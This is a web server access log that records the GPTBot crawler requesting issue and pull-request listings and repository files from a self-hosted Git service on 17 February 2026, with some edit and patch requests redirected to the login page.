https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:29:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:29:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:29:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:29:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11364] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:29:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11362] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:29:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe?display=rendered" [Client 74.7.227.38] [Length 10895] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe" -[17/Feb/2026:19:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py?display=rendered" [Client 74.7.227.38] [Length 11135] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:19:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3?display=source" [Client 74.7.227.38] [Length 11304] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:19:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libwinpthread-1.dll?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:19:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:29:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:29:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:19:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:19:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11185] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:19:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:29:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:29:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.56] [Sent-to 192.168.0.250] 